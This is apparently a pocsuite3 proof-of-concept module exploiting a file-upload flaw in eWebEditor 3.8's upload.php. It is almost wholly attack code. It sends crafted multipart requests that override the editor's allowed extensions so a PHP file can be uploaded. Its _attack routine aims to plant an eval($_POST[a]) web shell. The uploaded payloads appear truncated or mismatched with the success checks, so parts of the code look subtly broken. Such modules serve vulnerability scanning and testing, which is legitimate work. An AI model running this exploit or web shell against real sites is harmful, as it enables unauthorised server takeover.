"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
from urllib.parse import urljoin
import re
class DemoPOC(POCBase):
vulID = '1020' # ssvid
version = '1'
author = ['chenghs@knownsec.com']
vulDate = '2011-08-01'
createDate = '2013-07-29'
updateDate = '2013-07-29'
references = ['http://sebug.net/vuldb/ssvid-20860']
name = 'eWebEditor 3.8 /ewebeditor/php/upload.php 文件上传漏洞 POC'
appPowerLink = 'http://www.ewebeditor.com/'
appName = 'eWebEditor'
appVersion = '3.8#'
vulType = 'File Upload'
desc = '''
由于style参数可控,导致可以增加PHP格式文件。
'''
samples = []
install_requires = ['']
def _verify(self):
result = {}
try:
vul_url = urljoin(self.url, 'ewebeditor/php/upload.php?action=save&type=FILE&style=toby57&language=en')
headers = {'Content-Type': 'multipart/form-data; boundary=---------------------------19252181925439'}
verify_data = '''-----------------------------19252181925439
Content-Disposition: form-data; name="MAX_FILE_SIZE"
512000
-----------------------------19252181925439
Content-Disposition: form-data; name="aStyle[12]"
toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||ËÎÌå||||||0|||jpg|jpeg|||300|||FFFFFF|||1\r\n
-----------------------------19252181925439
Content-Disposition: form-data; name="uploadfile"; filename="1.php"
Content-Type: application/octet-stream
$url = $_SERVER["PHP_SELF"]; $filename = end(explode("/",$url));unlink($filename);?>
-----------------------------19252181925439--
'''
resp = requests.post(vul_url, data=verify_data, headers=headers)
res = re.findall("parent\.UploadSaved\(\'(.*?)\',\'\'\)", resp.text)
if not res:
return
verify_url = urljoin(self.url, res[0])
response = requests.get(verify_url)
if response.status_code == 200 and '300d4af0950c89b847cf6f7500e6060c' in response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = verify_url
except Exception as e:
logger.error(str(e))
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _attack(self):
result = {}
try:
vul_url = urljoin(self.url, 'ewebeditor/php/upload.php?action=save&type=FILE&style=toby57&language=en')
headers = {'Content-Type': 'multipart/form-data; boundary=---------------------------19252181925439'}
attack_data = '''-----------------------------19252181925439
Content-Disposition: form-data; name="MAX_FILE_SIZE"
512000
-----------------------------19252181925439
Content-Disposition: form-data; name="aStyle[12]"
toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||ËÎÌå||||||0|||jpg|jpeg|||300|||FFFFFF|||1\r\n
-----------------------------19252181925439
Content-Disposition: form-data; name="uploadfile"; filename="1.php"
Content-Type: application/octet-stream
-----------------------------19252181925439--
'''
resp = requests.post(vul_url, data=attack_data, headers=headers)
res = re.findall("parent\.UploadSaved\(\'(.*?)\',\'\'\)", resp.text)
if not res:
return
shell_url = urljoin(self.url, res[0])
response = requests.get(shell_url)
if response.status_code == 200 and '300d4af0950c89b847cf6f7500e6060c' in response.text:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = shell_url
result['ShellInfo']['Content'] = "<?php echo '300d4af0950c89b847cf6f7500e6060c'; eval($_POST[a]);?>"
except Exception as e:
logger.error(str(e))
return self.parse_output(result)
def _shell(self):
pass
register_poc(DemoPOC)